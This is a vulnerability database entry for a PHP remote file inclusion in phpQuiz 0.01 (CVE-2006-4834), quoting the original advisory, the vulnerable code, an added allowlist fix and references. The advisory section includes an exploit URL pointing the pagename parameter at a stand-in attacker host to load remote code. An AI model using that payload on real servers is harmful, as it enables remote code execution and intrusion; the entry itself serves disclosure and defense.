Jule Slootbeek phpQuiz 'index.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1111038    Vulnerability type: Input validation
Published: 2006-09-14    Updated: 2006-09-19
CVE: CVE-2006-4834    CNNVD-ID: CNNVD-200609-291
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/2366
https://cxsecurity.com/issue/WLB-2006090115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-291
|Vulnerability details
A PHP remote file inclusion vulnerability exists in index.php of Jule Slootbeek phpQuiz 0.01. A remote attacker can execute arbitrary PHP code by supplying a URL in the pagename parameter.
|Vulnerability EXP
#############################SolpotCrew Community################################
#
#  phpQuiz v0.01 design and coding by Jule Slootbeek (pagename) Remote File Inclusion
#
#  Download file : http://www.furor-normannicus.de/phpQuiz/download/phpQuiz.zip
#
#################################################################################
#
#
#       Bug Found By: Solpot a.k.a (k. Hasibuan) (14-09-2006)
#
#       contact: chris_hasibuan@yahoo.com
#
#       Website : http://www.nyubicrew.org/adv/solpot-adv-07.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
#              x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ ,#nyubi , #hitamputih @dalnet
#              and all member solpotcrew community @ http://www.nyubicrew.org/forum/
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "pagename" is not properly verified 
before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources. 
code from index.php
<?php
 //include global variables.
 include('global.inc.php');
 if (empty($pagename)) $pagename=main_menu;
 require ("$pagename.php");
?>
exploit : http://somehost/path_to_phpQuiz/index.php?pagename=http://evil
##############################MY LOVE JUST FOR U RIE######################### 
######################################E.O.F################################## 

# milw0rm.com [2006-09-14]
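The index.php snippet quoted in the advisory passes $pagename straight into require(), and it only receives that value at all because register_globals was enabled. The version below is an added hardening example, not code from phpQuiz or from the advisory author: it reads the parameter explicitly and resolves it through a fixed allowlist, so untrusted input never reaches require() whether or not URL includes are permitted; the page names in the allowlist are assumed for illustration.

```php
<?php
// Added hardening example for the phpQuiz index.php pattern; not the project's own code.

// Permitted page names mapped to files under a fixed directory.
// These names are assumed for illustration.
const ALLOWED_PAGES = [
    'main_menu' => 'main_menu.php',
    'quiz'      => 'quiz.php',
    'results'   => 'results.php',
];

// Resolve an untrusted page name to a file path, or null if it is not allowed.
// The request value is only ever used as an array key, never as part of a path,
// so neither "http://..." nor "../" sequences can influence which file is loaded.
function resolve_page(string $requested, string $baseDir): ?string
{
    $name = ($requested === '') ? 'main_menu' : $requested;   // same default as the original
    if (!array_key_exists($name, ALLOWED_PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . ALLOWED_PAGES[$name];
}

// Read the parameter explicitly instead of relying on register_globals.
$requested = isset($_GET['pagename']) ? (string) $_GET['pagename'] : '';

include 'global.inc.php';   // global variables, as in the original index.php

$page = resolve_page($requested, __DIR__ . '/pages');
if ($page === null) {
    // Unknown page: refuse rather than guess. Log the raw value for detection.
    http_response_code(404);
    error_log('phpQuiz: rejected pagename value: ' . substr($requested, 0, 200));
    exit('Unknown page');
}

require $page;
```

Rejected values show up in the PHP error log, which gives a simple detection hook for scanning attempts against the old parameter.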
|References

Source: BID, Name: 20019, Link: http://www.securityfocus.com/bid/20019
Source: BUGTRAQ, Name: 20060914 SolpotCrew Advisory #9 - phpQuiz v0.01 design and coding by Jule Slootbeek (pagename) Remote File Inclusion, Link: http://www.securityfocus.com/archive/1/archive/1/446039/100/0/threaded
Source: MISC, Link: http://www.nyubicrew.org/adv/solpot-adv-07.txt
Source: VUPEN, Name: ADV-2006-3611, Link: http://www.frsirt.com/english/advisories/2006/3611
Source: XF, Name: phpquiz-index-file-include(28947), Link: http://xforce.iss.net/xforce/xfdb/28947
Source: SREASON, Name: 1587, Link: http://securityreason.com/securityalert/1587